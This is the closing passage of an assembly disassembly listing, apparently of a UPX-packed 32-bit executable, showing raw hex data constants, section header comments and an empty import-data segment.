dd 771AB978h, 0D7FF30CFh, 0B41872Fh, 68C06CC8h, 0B0D15310h
dd 0A800589Fh, 48A0E5B8h, 0E8605AF0h, 88E00828h, 28903030h
dd 0ECE278D0h, 6945A070h, 0B88B810h, 6A0058B0h, 1C2DF87Ch
dd 0C68D94D4h, 0F4E0C013h, 2868B829h, 432078D0h, 35F03C24h
dd 0E5E1A29Bh, 0A8366037h, 0B74142B8h, 0EC82F90Fh, 8FE53B90h
dd 0ED81DA36h, 0D08BADB2h, 0BAD4E842h, 90A3FFFFh, 1CEh dup(0)
dd offset dword_3143209C
dd 13DEh dup(0)
UPX2 ends
; Section 4. (virtual address 0001A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start